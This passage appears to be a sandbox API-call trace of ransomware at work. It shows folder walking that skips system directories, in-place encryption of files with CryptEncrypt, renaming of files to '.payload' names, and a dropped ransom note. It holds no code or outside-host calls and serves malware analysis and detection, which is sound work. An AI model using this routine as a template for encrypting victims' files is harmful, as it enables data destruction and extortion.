hFindFile=0x606820, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0058.341] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0058.341] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0058.341] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0058.341] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0058.341] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0058.341] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 39 [0058.341] StrStrIW (lpFirst="eula.rtf", lpSrch=".payload") returned 0x0 [0058.341] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.341] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0058.341] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.341] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.342] GetTickCount () returned 0x114f06c [0058.342] GetTickCount () returned 0x114f06c [0058.342] GetTickCount () returned 0x114f06c [0058.342] GetTickCount () returned 0x114f06c [0058.342] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.342] GetProcessHeap () returned 0x5e0000 [0058.342] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.342] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x18a5, lpOverlapped=0x0) returned 1 [0058.343] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffe75b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.343] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x18a5, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x18a5, lpOverlapped=0x0) returned 1 [0058.343] GetProcessHeap () returned 0x5e0000 [0058.343] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.343] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.344] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.344] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.344] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.344] CloseHandle (hObject=0x438) returned 1 [0058.344] GetProcessHeap () returned 0x5e0000 [0058.344] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.344] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf_r00t_{nhhHyu}.payload") returned 61 [0058.344] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf_r00t_{nhhhyu}.payload")) returned 1 [0058.346] GetProcessHeap () returned 0x5e0000 [0058.346] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.346] FindNextFileW (in: hFindFile=0x606820, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0058.346] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0058.346] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0058.346] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0058.346] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0058.346] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0058.346] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 48 [0058.346] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".payload") returned 0x0 [0058.346] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.346] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0058.346] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.346] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.347] GetTickCount () returned 0x114f06c [0058.347] GetTickCount () returned 0x114f06c [0058.347] GetTickCount () returned 0x114f06c [0058.347] GetTickCount () returned 0x114f06c [0058.347] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.347] GetProcessHeap () returned 0x5e0000 [0058.347] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.347] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.369] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.369] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.369] GetProcessHeap () returned 0x5e0000 [0058.369] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.369] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.369] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.369] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.370] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.370] CloseHandle (hObject=0x438) returned 1 [0058.372] GetProcessHeap () returned 0x5e0000 [0058.372] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.372] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml_r00t_{nhhHyu}.payload") returned 70 [0058.372] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml_r00t_{nhhhyu}.payload")) returned 1 [0058.372] GetProcessHeap () returned 0x5e0000 [0058.372] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.372] FindNextFileW (in: hFindFile=0x606820, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0058.372] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0058.372] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0058.372] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0058.372] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0058.372] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0058.372] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 49 [0058.372] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".payload") returned 0x0 [0058.372] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.373] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0058.373] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1028\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.373] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.376] GetTickCount () returned 0x114f08b [0058.376] GetTickCount () returned 0x114f08b [0058.376] GetTickCount () returned 0x114f08b [0058.376] GetTickCount () returned 0x114f08b [0058.376] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.376] GetProcessHeap () returned 0x5e0000 [0058.376] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.376] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.378] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.378] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.378] GetProcessHeap () returned 0x5e0000 [0058.378] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.378] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.378] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.379] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.379] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.379] CloseHandle (hObject=0x438) returned 1 [0058.380] GetProcessHeap () returned 0x5e0000 [0058.380] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.380] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1028\\SetupResources.dll_r00t_{nhhHyu}.payload") returned 71 [0058.380] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\SetupResources.dll_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll_r00t_{nhhhyu}.payload")) returned 1 [0058.380] GetProcessHeap () returned 0x5e0000 [0058.380] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.380] FindNextFileW (in: hFindFile=0x606820, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0058.380] FindClose (in: hFindFile=0x606820 | out: hFindFile=0x606820) returned 1 [0058.380] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1028\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0058.380] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1028\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0058.381] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0058.382] CloseHandle (hObject=0x430) returned 1 [0058.382] GetProcessHeap () returned 0x5e0000 [0058.382] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0058.382] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1029", cAlternateFileName="")) returned 1 [0058.382] lstrcmpiW (lpString1="1029", lpString2="Windows") returned -1 [0058.382] lstrcmpiW (lpString1="1029", lpString2="$Recycle.bin") returned 1 [0058.382] lstrcmpiW (lpString1="1029", lpString2="System Volume Information") returned -1 [0058.382] lstrcmpiW (lpString1="1029", lpString2="Program Files") returned -1 [0058.382] lstrcmpiW (lpString1="1029", lpString2="Program Files (x86)") returned -1 [0058.382] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1029") returned 30 [0058.382] lstrcmpW (lpString1="1029", lpString2=".") returned 1 [0058.382] lstrcmpW (lpString1="1029", lpString2="..") returned 1 [0058.382] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1029", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0058.383] GetProcessHeap () returned 0x5e0000 [0058.383] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0058.383] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1029\\*") returned 32 [0058.383] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x6061e0 [0058.383] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0058.383] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0058.383] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0058.383] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0058.383] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0058.383] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1029\\.") returned 32 [0058.383] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.383] FindNextFileW (in: hFindFile=0x6061e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0058.383] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0058.384] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0058.384] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0058.384] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0058.384] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0058.384] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1029\\..") returned 33 [0058.384] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0058.384] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.384] FindNextFileW (in: hFindFile=0x6061e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe8e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0058.384] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0058.384] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0058.384] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0058.384] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0058.384] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0058.384] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 39 [0058.384] StrStrIW (lpFirst="eula.rtf", lpSrch=".payload") returned 0x0 [0058.384] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.384] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0058.384] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.384] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.385] GetTickCount () returned 0x114f09b [0058.385] GetTickCount () returned 0x114f09b [0058.385] GetTickCount () returned 0x114f09b [0058.385] GetTickCount () returned 0x114f09b [0058.385] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.385] GetProcessHeap () returned 0x5e0000 [0058.385] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.385] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0xe8e, lpOverlapped=0x0) returned 1 [0058.387] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffff172, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.387] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0xe8e, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0xe8e, lpOverlapped=0x0) returned 1 [0058.387] GetProcessHeap () returned 0x5e0000 [0058.387] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.387] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.387] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.387] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.387] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.387] CloseHandle (hObject=0x438) returned 1 [0058.388] GetProcessHeap () returned 0x5e0000 [0058.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.388] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf_r00t_{nhhHyu}.payload") returned 61 [0058.388] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf_r00t_{nhhhyu}.payload")) returned 1 [0058.390] GetProcessHeap () returned 0x5e0000 [0058.390] HeapFree (in: 